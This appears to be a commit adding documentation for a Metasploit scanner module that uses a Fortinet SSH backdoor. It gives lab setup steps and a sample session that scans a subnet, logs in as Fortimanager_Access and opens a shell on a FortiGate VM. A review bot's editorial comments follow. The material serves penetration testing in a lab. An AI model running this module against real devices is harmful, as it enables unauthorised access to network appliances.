Commit a9d6845

Add module doc
1 parent 3880f6a commit a9d6845

1 file changed

+63
-0
lines changed

@@ -0,0 +1,63 @@
1+
## Intro
2+
3+
This module scans for the Fortinet SSH backdoor and creates sessions.
4+
5+
## Setup
6+
7+
1. `git clone https://github.com/nixawk/labs`
8+
2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
9+
3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
10+
11+
## Usage
12+
13+
```
14+
msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
15+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
16+
rhosts => 192.168.212.0/24
17+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
18+
threads => 100
19+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
20+
21+
[*] Scanned 54 of 256 hosts (21% complete)
22+
[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
23+
[*] Scanned 65 of 256 hosts (25% complete)
24+
[*] Scanned 78 of 256 hosts (30% complete)
25+
[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
26+
[*] Scanned 104 of 256 hosts (40% complete)
27+
[*] Scanned 141 of 256 hosts (55% complete)
28+
[*] Scanned 154 of 256 hosts (60% complete)
29+
[*] Scanned 180 of 256 hosts (70% complete)
30+
[*] Scanned 205 of 256 hosts (80% complete)
31+
[*] Scanned 240 of 256 hosts (93% complete)
32+
[*] Scanned 256 of 256 hosts (100% complete)
33+
[*] Auxiliary module execution completed
34+
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
35+
[*] Starting interaction with 1...
36+
37+
FortiGate-VM # get system status
38+
Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
39+
Virus-DB: 16.00560(2012-10-19 08:31)
40+
Extended DB: 1.00000(2012-10-17 15:46)
41+
Extreme DB: 1.00000(2012-10-17 15:47)
42+
IPS-DB: 4.00345(2013-05-23 00:39)
43+
IPS-ETDB: 0.00000(2000-00-00 00:00)
44+
Serial-Number: FGVM00UNLICENSED
45+
Botnet DB: 1.00000(2012-05-28 22:51)
46+
License Status: Evaluation license expired
47+
Evaluation License Expires: Thu Jan 28 13:05:41 2016
48+
BIOS version: 04000002
49+
Log hard disk: Need format
50+
Hostname: FortiGate-VM
51+
Operation Mode: NAT
52+
Current virtual domain: root
53+
Max number of virtual domains: 10
54+
Virtual domains status: 1 in NAT mode, 0 in TP mode
55+
Virtual domain configuration: disable
56+
FIPS-CC mode: disable
57+
Current HA mode: standalone
58+
Branch point: 228
59+
Release Version Information: GA Patch 4
60+
System time: Wed Feb 21 13:13:43 2018
61+
62+
FortiGate-VM #
63+
```
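
Review bot: Setup step 3 (doc line 9) is a bare link with no instruction, and it points at the FortiWeb administration guide (`fweb/580/Content/FortiWeb/...`) while step 2 imports a FortiGate VM. Say in words what the reader has to do at that step, presumably configure the VM's network interface so it is reachable from the scanning host, and link the matching FortiGate documentation if a link is still wanted. The Intro (doc line 3) also never names the affected firmware; the only version on the page is the `v5.0,build0228` string in the sample session, so a one-line statement of the vulnerable versions the module targets would let a reader judge whether their lab image applies. Minor: the Usage fence opened at doc line 13 has no language tag.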
